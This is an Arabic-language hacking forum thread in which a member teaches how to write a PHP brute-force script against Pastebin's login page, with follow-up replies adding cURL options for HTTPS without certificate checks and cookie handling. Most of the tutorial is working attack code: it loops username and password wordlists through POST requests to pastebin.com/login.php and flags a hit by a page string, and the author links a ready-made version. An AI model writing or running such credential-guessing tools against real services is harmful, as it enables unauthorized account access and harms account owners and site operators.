Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

Hamza-xDz عضو مميز
  • شكراً: 1349
  • تم شكره 1287 مرة في 298 مشاركة


سلام حبايب كيفكم إنشاء الله بخير
اليوم رح نحكي عن سكريبتات التخمين و كيفية برمجتهم
الشغلة سهلة ومافيها أي تعقيد
أوكي نبدأ بالشرح
شوف مثلا لدينا لوحة لدينا خانة اليوزر والباسورد وكل وحدة عندها إسم
أوكي أول شيئ لما نحب نبرمج وحدة نستخرج الخانات لي نحتجها أوكي رح نجرب اليوم على
pastebin
نفتح أي أداة لأستقبال مبادلات
Post
مثلا http headers
وندخل أي شيئ في الخانات ونط أوكي شوفو الصورة

أوكي لدينا فالبوست

كود PHP:
submit_hidden=submit_hidden&user_name=dzdz&user_password=dzdz&submit=Login 
أوكي نحن أدخلنا dzdz كيوزر و باسورد
الأن نحتاج
كود PHP:
submit_hidden=submit_hidden&user_name=$user&user_password=$pass&submit=Login 
هذا هو البوست الي رح نكرره حتى غيجاد الباسورد
نبدأ فالبرمجة
أولا رح نبرمج من cli
نقوم بفتح وسم
php
ثم نقوم بجلب محتوى اليوزرات و الباسوردات من ملف
بإستعمال دالة
file_get_contents
و الفصل بين كل يوزر وباسورد ب
\n
والتي تمثل سطر جديد بإستعمال الدالة
explode
لازم تكون تعرف شوية أساسيات php
كود PHP:
<?
$user=explode('\n',file_get_contents("./user.txt"));
$password=explode('\n',file_get_contents("./pass.txt"));
?>
أوكي الأن نعمل تكرار لكل باسورد ليدور على شكل حلقات و نبدأ باليوزرات ليدور عليه كل الباسوردات على كل يوزر
و نعمل trim
لفصل المسافات الفارغة
كود PHP:
<?
$user=explode('\n',file_get_contents("./user.txt"));
$password=explode('\n',file_get_contents("./pass.txt"));
foreach($user as $u )
{
$us=trim($u);
foreach($password as $passs){
$pwd=trim($passs);
}
}
?>
أوكي الأن نبرمج دالة التخمين
رح نستعمل مكتبة الكيرل يمكنك البحث عنها في قوقل
رح أشرح ف التعليقات
كود PHP:
<?
function brut($user,$pass){
$post=array("submit_hidden"=>"submit_hidden","user_name"=>$user,"user_password"=>$pass,"submit"=>"Login");// هذا البوست الي إستخرجهاه من قبل  مع وصع مكان اليوزر والباس في مكانهم في البوست وضعناهم في مصفوة
   $urlv='http://pastebin.com/login.php';// رابط الدخول 
                $sh = curl_init();// بدأ أو إعلان عن جلسة كيرل 
                curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);///redirction إتباع تغير الرابط مثلا إذا كان يقوم ب  
                curl_setopt($sh,CURLOPT_URL, $urlv);/// الرابط المرجة العمل عليه 
                curl_setopt($sh,CURLOPT_POSTFIELDS,$post);// submit_hidden=submit_hidden&user_name=$user&user_password=$pass&submit=Login خانات البوست الي عملها في مصفوفة لتنظيم ويمكنك وضعهم كماهم  مثلا  
                $brute = curl_exec($sh);// تنفيد الجلسة 
                if(eregi('TOTAL PASTES' , $brute))///فأذا وجدها في الناتج عن تنفيد الجلسة يرجع القيمة صحيحة و بذلك قد تم التخمين  TOTAL PASTES الأعتماد على 
                {
                  return true;
                }else{
               return false;
 
                }
  }
?>
أوكي نجمع الأ، الكود
كود PHP:
<?
$user=explode('\n',file_get_contents("./user.txt"));
$password=explode('\n',file_get_contents("./pass.txt"));
foreach($user as $u )
{
$us=trim($u);
foreach($password as $passs){
$pwd=trim($passs);
$p=brut($us,$pwd);
if($p){
echo"
[+] Found $us -> $pwd 
";
}
}
}
 function brut($user,$pass){
    $post=array("submit_hidden"=>"submit_hidden","user_name"=>$user,"user_password"=>$pass,"submit"=>"Login");
   $urlv='http://pastebin.com/login.php';
                $sh = curl_init();
                curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
                curl_setopt($sh,CURLOPT_URL, $urlv);
                curl_setopt($sh,CURLOPT_POSTFIELDS,$post);
                $brute = curl_exec($sh);
                if(eregi('TOTAL PASTES' , $brute))
                {
                  return true;
                }else{
               return false;
 
                }
  }
?>
true عملنا تحقق بدالة إذا أرجعت الدالة قيمة صحيحة
يطبع اليوزر والباسورد الدي تم الدخول له
أنا قمت بعمل أداة على السريع البارحة
مرتب يها الأكواد
http://pastebin.com/U6rppJnm
ربما تفيدك

وإنتهينا
php المهم شرح بسيط للمقبلين على
وبالتوفيق

توقيع
كرهنا
RAB3OUN Ş4È´cΘđ3г
  • شكراً: 423
  • تم شكره 2824 مرة في 365 مشاركة

يمكن إستبدال

كود PHP:
$user=explode('\n',file_get_contents("./user.txt")); 

ب

كود PHP:
$user=file("./user.txt"); 
في الكيرل

إضافة

إذا كان الموقع https
كود PHP:
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false); 

لإضهار الهيدر
كود PHP:
curl_setopt($chCURLOPT_HEADER1); 
لإستعمال الكوكي
كود PHP:
curl_setopt($chCURLOPT_COOKIEJARgetcwd()."/123.txt"); 
curl_setopt($chCURLOPT_COOKIEFILEgetcwd()."/123.txt"); 

17 أعضاء قالوا شكراً لـ RAB3OUN على المشاركة المفيدة:
Mr.jNe عضو نشيط
  • شكراً: 33
  • تم شكره 21 مرة في 15 مشاركة

المتغيرات هذي
$user $pass
من وين جبتها يمكن حاط صاحب الموقع غير هالاسماء انت خمنتها تخمين او من وين جبتها

2 أعضاء قالوا شكراً لـ Mr.jNe على المشاركة المفيدة:
Hamza-xDz عضو مميز
  • شكراً: 1349
  • تم شكره 1287 مرة في 298 مشاركة

المشاركة الأصلية كتبت بواسطة mr.jne اقتباس :
المتغيرات هذي
$user $pass
من وين جبتها يمكن حاط صاحب الموقع غير هالاسماء انت خمنتها تخمين او من وين جبتها
سلا ذالك مثال وضعته عن يوزرات و الباسوردات المراد التخمين بهم + لا علاقة للموقع بذلك + كل سكريبت له اسم البوست لكل خانة

توقيع
كرهنا
الأعضاء الذين قالوا شكراً لـ Hamza-xDz على المشاركة المفيدة:
Hamza-xDz عضو مميز
  • شكراً: 1349
  • تم شكره 1287 مرة في 298 مشاركة

أسف عن الأخطاء الكتابية
قليل وين أكتب عربي :d

توقيع
كرهنا
2 أعضاء قالوا شكراً لـ Hamza-xDz على المشاركة المفيدة:
Virus Duba عضو مميز
  • شكراً: 348
  • تم شكره 136 مرة في 78 مشاركة

الله يعطيك العافية

شرح مبسط وسلس وجميل

توقيع
سبحان الله وبحمده سبحان الله العظيم

أثنان لا يتعلمان ، المتكبر والخجول

اللهم زدنا علم سبحانك لا علم لنا إلا ماعلمتنا إنك أنت العليم الخبير
الأعضاء الذين قالوا شكراً لـ Virus Duba على المشاركة المفيدة:
abdotv عضو مميز
  • شكراً: 57
  • تم شكره 204 مرة في 78 مشاركة

شرح جميل

بالتوفيق لك اخي الكريم

الأعضاء الذين قالوا شكراً لـ abdotv على المشاركة المفيدة:
BanD عضو نشيط
  • شكراً: 29
  • تم شكره 41 مرة في 13 مشاركة

لو كان فيديو تطبيق بيكون افضل بنتظار جديدك

الأعضاء الذين قالوا شكراً لـ BanD على المشاركة المفيدة:
Ilyes Milano عضو مميز
  • شكراً: 248
  • تم شكره 145 مرة في 72 مشاركة

شرح جميل.....بالتوفيق

توقيع
لا تأسفن على غدر الزمان لطالما...رقصت على جثث الأسود كلاب
لا تحسبن برقصها تعلو على أسيادها...تبقى الأسود أسودا والكلاب كلاب.
الأعضاء الذين قالوا شكراً لـ Ilyes Milano على المشاركة المفيدة:
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever